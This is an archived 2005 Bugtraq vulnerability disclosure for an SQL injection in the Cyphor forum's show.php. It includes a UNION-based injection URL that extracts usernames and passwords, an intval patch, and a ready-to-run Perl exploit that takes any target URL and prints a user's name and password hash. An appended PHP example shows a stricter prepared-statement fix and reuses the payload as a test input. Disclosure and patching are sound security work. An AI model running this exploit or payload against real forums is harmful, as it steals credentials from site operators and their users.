Message-ID: <20051113192127.19612.qmail@securityfocus.com>
Date: 13 Nov 2005 19:21:27 -0000
From: s2b@...mail.com
To: bugtraq@...urityfocus.com
Subject: Cyphor  (Release: 0.19) Sql injection


Hello

This is an SQL injection in Cyphor

Discovered by : HACKERS PAL

Greets For Devil-00 - Abducter - Almaster
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Injected versions :-
Cyphor (Release: 0.19) and all versions up to now
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Injected file
show.php
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
injection code :-
show.php?fid=2&id=-10%20union%20select%20id,null,null,null,null,nick,password,null,null,null%20from%20users%20where%20id=1
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Discovering the vulnerability :-
Look in the show.php file at lines 59 to 62, shown below

[code]
    if ($id) {
        // a message with id=$id will be displayed
        $message_mode = 1;
        $query = "SELECT * FROM $db_table_name WHERE id=$id";
[/code]

The programmer didn't check whether the $id variable was an integer.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
How to protect :-

After
        $message_mode = 1;

add
        // Script protection by : HACKERS PAL
        // Force $id to an integer; stop if the result is 0 (missing or non-numeric input)
        $id = intval($id);
        if (!$id)
        {
            die("<br>We Dont allow Skript Kidz .. <br> By <a href='Http://www.sqor.net'>HACKERS PAL</a>");
        }
        // Script protection by : HACKERS PAL finished
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
exploit :-

#!/bin/env perl

#//-----------------------------------------------------------#

#//        Cyphor Forum SQL Injection Exploit .. By HACKERS PAL

#//                   Greets For Devil-00 - Abducter - Almaster

#//                          http://WwW.SoQoR.NeT

#//-----------------------------------------------------------#



use LWP::Simple;



print "\n#####################################################";

print "\n#      Cyphor Forum Exploit By : HACKERS PAL        #";

print "\n#               Http://WwW.SoQoR.NeT                #";



if(!$ARGV[0]||!$ARGV[1]) {

print "\n# -- Usage:                                         #";

print "\n# -- perl $0 [Full-Path] 1                      #";

print "\n# -- Example:                                       #";

print "\n# -- perl $0 http://www.cynox.ch/cyphor/forum/ 1#";

print "\n#     Greets To Devil-00 - Abducter - almastar      #";

print "\n#####################################################\n";

    exit(0);

}

else

{

print "\n#     Greets To Devil-00 - Abducter - almastar      #";

print "\n#####################################################\n";



        $web=$ARGV[0];
        $id=$ARGV[1];

$url = "show.php?fid=2&id=-10%20union%20select%20id,2,3,4,5,nick,password,8,id,10%20from%20users%20where%20id=$id";

            $site="$web/$url";

$page = get($site) || die "[-] Unable to retrieve: $!";

print "\n[+] Connected to: $ARGV[0]\n";



print "[+] User ID is : $id ";

$page =~ m/<span class=bigh>(.*?)<\/span>/ && print "\n[+] User Name is: $1\n";

print "\n[-] Unable to retrieve User Name\n" if(!$1);

$page =~ m/<span class=message>(.*?)<\/span>/ && print "[+] Hash of password is: $1\n";

print "[-] Unable to retrieve hash of password\n" if(!$1);



}



print "\n\nGreets From HACKERS PAL To you :)\nWwW.SoQoR.NeT . . . You Are Welcome\n\n";

#finished
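A stricter form of the "How to protect" step above, as an added example that is not part of the original advisory or of Cyphor's code. It rejects any `id` that is not a clean positive integer instead of coercing it (`intval("7 or 1=1")` returns 7), and binds the value in a prepared statement. The in-memory SQLite database (needs `pdo_sqlite`), the `forum_2` table, `FORUM_TABLES`, `positive_int()` and `fetch_message()` are all hypothetical names constructed for the example.

```php
<?php
declare(strict_types=1);

// Constructed stand-in for the forum database (in-memory SQLite via PDO).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE forum_2 (id INTEGER PRIMARY KEY, subject TEXT, body TEXT)');
$pdo->exec("INSERT INTO forum_2 (id, subject, body) VALUES (7, 'Welcome', 'First post')");

// Identifiers cannot be bound as parameters, so the table name comes
// from a fixed allowlist keyed by forum id (hypothetical mapping).
const FORUM_TABLES = [2 => 'forum_2'];

/** Return the request value as a positive integer, or null for anything else. */
function positive_int(mixed $raw): ?int
{
    $value = is_string($raw)
        ? filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]])
        : false;
    return $value === false ? null : $value;
}

/** Fetch one message; null means bad input, unknown forum, or no such row. */
function fetch_message(PDO $pdo, mixed $fid, mixed $id): ?array
{
    $fid = positive_int($fid);
    $id  = positive_int($id);
    if ($fid === null || $id === null || !array_key_exists($fid, FORUM_TABLES)) {
        return null;
    }
    // Only the validated integer reaches the query, and only as a bound parameter.
    $stmt = $pdo->prepare('SELECT id, subject, body FROM ' . FORUM_TABLES[$fid] . ' WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed inputs: a valid id, a value intval() would coerce to 7,
// and the URL-decoded id value from the advisory's request.
$cases = [
    '7',
    '7 or 1=1',
    '-10 union select id,null,null,null,null,nick,password,null,null,null from users where id=1',
];
foreach ($cases as $raw) {
    $row = fetch_message($pdo, '2', $raw);
    printf("%-12.12s => %s\n", $raw, $row === null ? 'rejected' : $row['subject']);
}
```

Only the first input returns a row; the other two are rejected before any SQL is built.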

